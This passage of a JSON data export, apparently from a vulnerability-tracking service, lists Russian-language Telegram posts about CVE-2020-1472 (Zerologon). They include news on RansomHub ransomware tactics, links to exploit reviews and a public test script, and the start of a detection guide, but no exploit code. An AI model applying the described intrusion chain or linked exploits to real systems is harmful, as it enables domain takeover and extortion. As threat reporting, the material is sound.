\u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432.\n\nRansomHub \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u0438. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0432\u0437\u043b\u043e\u043c\u0430 \u2014 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 VPN-\u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0438 \u043f\u043e\u0434\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u0442\u0430\u043a \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432\u0440\u043e\u0434\u0435 PCHunter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u0422\u0430\u043a\u0442\u0438\u043a\u0430 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u0430\u0445\u0432\u0430\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0446\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u0430\u044e\u0442 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u0443\u0437\u043b\u0430\u043c\u0438 \u2014 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u043c\u0438, \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u043c\u0438 \u043a\u043e\u043f\u0438\u044f\u043c\u0438, \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u2014 \u0438 \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u044f\u0442 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b. \u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 Filezilla, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 RansomHub \u0448\u0430\u043d\u0442\u0430\u0436\u0438\u0440\u0443\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u0443, \u0442\u0440\u0435\u0431\u0443\u044f \u0432\u044b\u043a\u0443\u043f \u0437\u0430 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u0438 \u043d\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044e \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b, \u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0442\u044c \u0442\u0435\u043d\u0435\u0432\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0437\u0430\u0447\u0438\u0449\u0430\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u044f \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 .\n\n\u041e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a RansomHub \u0441\u0442\u0430\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f, \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043d\u043d\u0430\u044f \u0432\u0441\u0435\u0433\u043e \u0437\u0430 14 \u0447\u0430\u0441\u043e\u0432. \u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u043c \u044d\u043a\u0440\u0430\u043d\u0435 Palo Alto ( CVE-2024-3400 ) \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442 VPN-\u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0442\u0430\u0440\u044b\u0435 \u0431\u0440\u0435\u0448\u0438 \u0432 Windows ( CVE-2021-42278 \u0438 CVE-2020-1472 ), \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0435\u0442\u044c\u044e.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u0442\u043e\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0438\u0437-\u0437\u0430 \u043d\u0435\u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u0415\u0441\u043b\u0438 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u0442\u043e \u0432\u0438\u043d\u043e\u0432\u0430\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0435\u0451 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0445\u0430\u043b\u0430\u0442\u043d\u043e\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0433\u043b\u0443\u043f\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043d\u0430 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u0442\u0443\u0449\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437. \u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0443\u0441\u0438\u043b\u0438\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0437\u0430\u0449\u0438\u0442\u0443, \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0438 \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0436\u0435\u0440\u0442\u0432 RansomHub \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-02-17T08:21:47.000000Z"}, {"uuid": "0407863b-dcea-40af-8a89-1e62fdfba3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/SumV8avL7Sbl1SJPE_rB4-ULAsTbHoJ55H_PswnJfdlCjxM", "content": "", "creation_timestamp": "2025-10-05T03:00:06.000000Z"}, {"uuid": "c776bb1e-9a27-44d8-9953-2355f6be37e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/3525", "content": "\u200b\u200b\u0421\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0442\u0435\u043c\u044b \u0437\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e\n\n\u2714\ufe0f Soft - Cscan\n\u2714\ufe0f Keychain \u0432 iOS - \u0447\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438?\n\u2714\ufe0f \u0413\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u044b\u0445 \u0447\u0438\u0441\u0435\u043b Python\n\u2714\ufe0f SYSENTER \u2013 \u0441\u043a\u0440\u044b\u0442\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a Native-API\n\u2714\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Recon\n\u2714\ufe0f \u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\u2714\ufe0f \u041a\u0430\u043a \u0437\u0430\u0431\u0430\u043d\u0438\u0442\u044c IP \u0430\u0434\u0440\u0435\u0441?\n\u2714\ufe0f \u0412\u0430\u043a\u0430\u043d\u0441\u0438\u044f - \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u043f\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044e \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Advanced Threat Protection\n\u2714\ufe0f \u0412\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0432\u043a\n\u2714\ufe0f \u041d\u0430 \u043a\u0430\u043a\u043e\u043c \u044f\u043f \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435?\n\u2714\ufe0f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435", "creation_timestamp": "2020-10-14T10:10:43.000000Z"}, {"uuid": "6f52a952-552e-485d-8d6a-12c68c2fd812", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/4535", "content": "\u200b\u200b\u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\n\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2020 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0435\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430.\n\u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0443\u0433\u043b\u0443\u0431\u0438\u0442\u044c\u0441\u044f \u0432 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443, \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0432 \u043f\u0440\u0438\u0447\u0438\u043d\u0430\u0445 \u0438 \u0440\u0438\u0441\u043a\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b.\n\n\u0427\u0438\u0442\u0430\u0442\u044c: https://codeby.net/threads/obzor-ujazvimosti-cve-2020-1472-i-ehksploita-zerologon.75277/\n\n#exploit #windows", "creation_timestamp": "2021-06-01T17:17:00.000000Z"}, {"uuid": "bdcce02f-9ea6-45c5-a132-49eb0126ef69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/x_notes/202", "content": "\ud83d\udfe2\ud83d\udfe2\n\ud83d\udcf0 \u041d\u0430 #github \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 #Zerologon (CVE-2020-1472). \u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0430\u0435\u0442 \u0441\u0435\u0441\u0441\u0438\u044e.\n\ud83d\udd25 \u0415\u0441\u043b\u0438 \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0432 \u043a\u0443\u0440\u0441\u0435 \u0434\u0435\u043b\u0430, \u0442\u043e #Microsoft \u0437\u0430\u043f\u0430\u0442\u0447\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043f\u0443\u0442\u0451\u043c \u0432\u044b\u0437\u043e\u0432\u0430 #RPC \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0430, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e. \n\u2764\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 10 \u0431\u0430\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 #CVSS. \u0422\u0430\u043a \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u043d\u0430\u043a\u0430\u0442\u0438\u043b\u0438 \u0430\u043f\u0434\u0435\u0439\u0442\u044b, \u0442\u043e \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0440\u0430. \u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u044d\u0442\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0443\u043c\u0435\u043b\u044c\u0446\u044b \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u043f\u0438\u0448\u0443\u0442 \u0431\u043e\u0435\u0432\u043e\u0439 \u0441\u043f\u043b\u043e\u0439\u0442, \u0430 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0435\u0442 \u0431\u0435\u0434\u0430.\n\n#vulnerability #ActiveDirectory #patchtuesday \n\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-22T18:42:29.000000Z"}, {"uuid": "7e85bac3-7a4a-4b60-a983-af8d31b12902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/codeby_sec/8087", "content": "\u200b\u200b\u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\n\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2020 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0435\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430.\n\u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0443\u0433\u043b\u0443\u0431\u0438\u0442\u044c\u0441\u044f \u0432 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443, \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0432 \u043f\u0440\u0438\u0447\u0438\u043d\u0430\u0445 \u0438 \u0440\u0438\u0441\u043a\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b.\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043b\u0435\u0435\n\n#exploit #windows", "creation_timestamp": "2024-04-11T17:39:27.000000Z"}, {"uuid": "e2de459b-2939-4304-8f69-9fa63e68f10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/0kkoPZe9SRaFjk6r6hE0E-PGR1LEPuhACBCZgoO035MqCFM", "content": "", "creation_timestamp": "2025-10-05T03:00:12.000000Z"}, {"uuid": "5765c879-0f40-461e-9da8-266b01b71d7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/antichat/8859", "content": "\u041d\u0430\u043f\u0438\u0441\u0430\u043b\u0438 \u0433\u0430\u0439\u0434 \u043f\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0444\u0430\u043a\u0442\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043b\u0435\u0442 \u2014 CVE-2020-1472, \u0438\u043b\u0438 Zerologon.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u0430\u0436\u0435 \u0431\u0435\u0437 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043a\u0430\u043a\u043e\u0433\u043e-\u043b\u0438\u0431\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.\n\n\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Zerologon:\n\u25aa\ufe0f\u043f\u043e 